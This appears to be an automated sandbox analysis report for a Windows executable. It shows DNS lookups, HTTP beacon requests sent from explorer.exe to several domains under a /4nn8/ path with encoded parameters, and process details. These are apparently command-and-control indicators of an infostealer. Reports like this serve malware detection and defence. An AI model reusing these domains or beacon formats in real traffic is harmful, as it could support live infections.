                                                        Jul 22, 2021 13:14:05.842089891 CEST53517268.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:07.014611006 CEST5679453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:07.064395905 CEST53567948.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:07.971545935 CEST5653453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:08.039866924 CEST53565348.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:10.682776928 CEST5662753192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:10.734731913 CEST53566278.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:14.528445959 CEST5662153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:14.577896118 CEST53566218.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:18.710480928 CEST6311653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:18.759555101 CEST53631168.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:18.910850048 CEST6407853192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:18.984868050 CEST53640788.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:20.194933891 CEST6480153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:20.247428894 CEST53648018.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:42.673732042 CEST6172153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:42.730659008 CEST53617218.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:43.360750914 CEST5125553192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:43.465878010 CEST53512558.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:44.152862072 CEST6152253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:44.282011032 CEST53615228.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:45.132668972 CEST5233753192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:45.191127062 CEST53523378.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:45.219687939 CEST5504653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:45.277264118 CEST53550468.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:45.806031942 CEST4961253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:45.862972975 CEST53496128.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:47.597892046 CEST4928553192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:47.658058882 CEST53492858.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:48.231107950 CEST5060153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:48.282330036 CEST53506018.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:48.845844984 CEST6087553192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:48.898147106 CEST53608758.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:49.913254023 CEST5644853192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:49.973439932 CEST53564488.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:50.913597107 CEST5917253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:50.966593981 CEST53591728.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:51.733690023 CEST6242053192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:51.786133051 CEST53624208.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:55.605300903 CEST6057953192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:55.665595055 CEST53605798.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:27.176110983 CEST5018353192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:27.237327099 CEST53501838.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:27.254256010 CEST6153153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:27.321616888 CEST53615318.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:29.288182974 CEST4922853192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:29.353451967 CEST53492288.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:33.012599945 CEST5979453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:33.074120998 CEST53597948.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:38.825973034 CEST5591653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:38.996172905 CEST53559168.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:44.418431997 CEST5275253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:44.483258009 CEST53527528.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:49.904895067 CEST6054253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:50.046713114 CEST53605428.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:55.338299036 CEST6068953192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:55.428956985 CEST53606898.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:16:00.590152979 CEST6420653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:16:00.653287888 CEST53642068.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jul 22, 2021 13:15:27.176110983 CEST192.168.2.48.8.8.80x121fStandard query (0)www.boicity.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:33.012599945 CEST192.168.2.48.8.8.80x1ca7Standard query (0)www.sh-zzjy.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:38.825973034 CEST192.168.2.48.8.8.80x73fStandard query (0)www.zrcezzfdfkyjlir.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:44.418431997 CEST192.168.2.48.8.8.80x641aStandard query (0)www.iafzal.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:49.904895067 CEST192.168.2.48.8.8.80x90feStandard query (0)www.nirvananaturalcbd.netA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.338299036 CEST192.168.2.48.8.8.80x666dStandard query (0)www.updates-app.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:16:00.590152979 CEST192.168.2.48.8.8.80x299cStandard query (0)www.fbgroupsmadesimple.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jul 22, 2021 13:15:27.237327099 CEST8.8.8.8192.168.2.40x121fNo error (0)www.boicity.com156.241.53.21A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:33.074120998 CEST8.8.8.8192.168.2.40x1ca7No error (0)www.sh-zzjy.com156.241.53.248A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:38.996172905 CEST8.8.8.8192.168.2.40x73fNo error (0)www.zrcezzfdfkyjlir.com199.34.228.66A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:44.483258009 CEST8.8.8.8192.168.2.40x641aNo error (0)www.iafzal.comiafzal.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 22, 2021 13:15:44.483258009 CEST8.8.8.8192.168.2.40x641aNo error (0)iafzal.com184.168.131.241A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:50.046713114 CEST8.8.8.8192.168.2.40x90feNo error (0)www.nirvananaturalcbd.net104.143.9.211A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:50.046713114 CEST8.8.8.8192.168.2.40x90feNo error (0)www.nirvananaturalcbd.net104.143.9.210A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)www.updates-app.comround-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com46.137.146.55A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com18.203.219.9A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com34.255.33.146A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com54.155.1.52A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com34.251.97.14A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com52.212.183.103A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com34.246.78.149A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com34.242.133.169A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:16:00.653287888 CEST8.8.8.8192.168.2.40x299cNo error (0)www.fbgroupsmadesimple.comfbgroupsmadesimple.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 22, 2021 13:16:00.653287888 CEST8.8.8.8192.168.2.40x299cNo error (0)fbgroupsmadesimple.com184.168.131.241A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.boicity.com
                                                        • www.sh-zzjy.com
                                                        • www.zrcezzfdfkyjlir.com
                                                        • www.iafzal.com
                                                        • www.nirvananaturalcbd.net
                                                        • www.updates-app.com
                                                        • www.fbgroupsmadesimple.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.449763156.241.53.2180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:27.482441902 CEST6096OUTGET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.boicity.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:47.860467911 CEST6118INHTTP/1.1 200 OK
                                                        Date: Thu, 22 Jul 2021 11:15:27 GMT
                                                        Server: Apache
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Connection: close
                                                        Set-Cookie: PHPSESSID=oii5c43eppespmfquijqnko7b4; path=/
                                                        Upgrade: h2
                                                        Connection: Upgrade
                                                        Content-Length: 0
                                                        Content-Type: text/html; charset=gbk


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.449766156.241.53.24880C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:33.302323103 CEST6110OUTGET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.sh-zzjy.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:34.220505953 CEST6111INHTTP/1.1 302 Moved Temporarily
                                                        Date: Thu, 22 Jul 2021 11:15:33 GMT
                                                        Server: Apache
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Set-Cookie: PHPSESSID=h4aj6vnqf4735he6qq4lbomgl0; path=/
                                                        Upgrade: h2
                                                        Connection: Upgrade, close
                                                        Location: /
                                                        Content-Length: 0
                                                        Content-Type: text/html; charset=gbk


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.449767199.34.228.6680C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:39.181869030 CEST6112OUTGET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.zrcezzfdfkyjlir.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:39.378952026 CEST6113INHTTP/1.1 404 Not Found
                                                        Date: Thu, 22 Jul 2021 11:15:39 GMT
                                                        Server: Apache
                                                        Set-Cookie: is_mobile=0; path=/; domain=www.zrcezzfdfkyjlir.com
                                                        Vary: X-W-SSL,User-Agent
                                                        Set-Cookie: language=en; expires=Thu, 05-Aug-2021 11:15:39 GMT; Max-Age=1209600; path=/
                                                        Cache-Control: private
                                                        X-Host: pages3.sf2p.intern.weebly.net
                                                        X-UA-Compatible: IE=edge,chrome=1
                                                        Content-Length: 3802
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 32 36 34 35 31 37 34 35 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><script src="/gdpr/gdprscript.js?buildTime=1626451745"></script><title>404 - Page Not Found</title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noarchive" /><link rel="shortcut icon" href="//cdn1.editmysite.com/developer/none.ico" /><style type="text/css">@font-face {font-family: 'Proxima Nova';font-weight: 300;src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot");src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot?#iefix") format("embedded-opentype"), url("//cdn2.editmysite.com/components/ui-framew


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.449768184.168.131.24180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:44.676069021 CEST6117OUTGET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.iafzal.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:44.885785103 CEST6118INHTTP/1.1 302 Found
                                                        Server: nginx/1.16.1
                                                        Date: Thu, 22 Jul 2021 11:15:44 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Location: https://afternic.com/forsale/iafzal.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.449769104.143.9.21180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:50.171391964 CEST6120OUTGET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.nirvananaturalcbd.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:50.310985088 CEST6121INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 22 Jul 2021 11:15:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ==
                                                        Data Raw: 33 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4d 4c 6c 30 52 4a 59 63 44 53 30 4e 32 78 49 67 69 30 31 72 4f 41 63 45 74 76 43 55 54 55 71 2b 49 75 4e 7a 35 50 41 38 65 58 59 73 66 50 4c 52 6b 67 6e 4e 65 68 4f 2b 4e 62 4f 5a 41 6c 4c 6f 51 6e 53 70 42 35 72 58 75 52 78 52 43 54 46 2b 54 31 69 55 39 73 43 41 77 45 41 41 51 3d 3d 5f 46 7a 72 55 30 4f 2f 44 7a 50 48 77 68 55 48 71 76 6f 31 7a 73 72 5a 64 36 4f 59 68 59 2f 43 4b 6d 4d 62 66 6b 49 70 4d 34 48 6b 71 70 55 4c 56 73 6e 44 61 5a 4e 70 42 52 79 43 56 65 75 30 75 67 70 4f 32 58 6f 73 32 4e 58 64 6a 47 74 51 6f 58 32 37 77 47 51 3d 3d 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 69 72 76 61 6e 61 6e 61 74 75 72 61 6c 63 62 64 2e 6e 65 74 20 61 74 20 44 69 72 65 63 74 6e 69 63 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 69 66 72 61 6d 65 20 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 7d 0a 68 74 6d 6c 2c 20 64 69 76 20 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 62 6f 64 79 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 20 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 30 35 30 30 30 35 2e 76 6f 6f 64 6f 6f 2e 63 6f 6d 2f 6a 73 2f 70 61 72 74 6e 65 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 319<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ=="><head><title>nirvananaturalcbd.net at Directnic</title><style>html, body, iframe {margin:0;padding:0;border:0;font-weight:inherit;font-style:inherit;font-size:100%;font-family:inherit;vertical-align:baseline;}html, div {height:100%;}body{line-height:1.5;height:100%;}</style></head><body><div id="partner" ></div><script type="text/javascript" language="JavaScript" src="http://050005.voodoo.com/js/partner.js"></script></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.44977046.137.146.5580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:55.499026060 CEST6122OUTGET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.updates-app.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:55.577905893 CEST6123INHTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        Server: gunicorn/20.0.4
                                                        Date: Thu, 22 Jul 2021 11:15:55 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Location: https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 0
                                                        Vary: Accept-Language, Origin
                                                        Content-Language: es-es
                                                        X-Protected-By: Sqreen
                                                        Via: 1.1 vegur


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.449771184.168.131.24180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:16:00.847594023 CEST6124OUTGET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.fbgroupsmadesimple.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:16:01.085139990 CEST6124INHTTP/1.1 302 Found
                                                        Server: nginx/1.16.1
                                                        Date: Thu, 22 Jul 2021 11:16:01 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Location: https://afternic.com/forsale/fbgroupsmadesimple.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: NQBNpLezqZKv1P4.exe PID: 6940 Parent PID: 6036

                                                        General

                                                        Start time:13:13:53
                                                        Start date:22/07/2021
                                                        Path:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
                                                        Imagebase:0x100000
                                                        File size:714240 bytes
                                                        MD5 hash:F03BF8D3ECC2AE4B40F836C59AC09BDF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low

                                                        Analysis Process: NQBNpLezqZKv1P4.exe PID: 3984 Parent PID: 6940

                                                        General

                                                        Start time:13:14:21
                                                        Start date:22/07/2021
                                                        Path:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        Imagebase:0x490000
                                                        File size:714240 bytes
                                                        MD5 hash:F03BF8D3ECC2AE4B40F836C59AC09BDF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
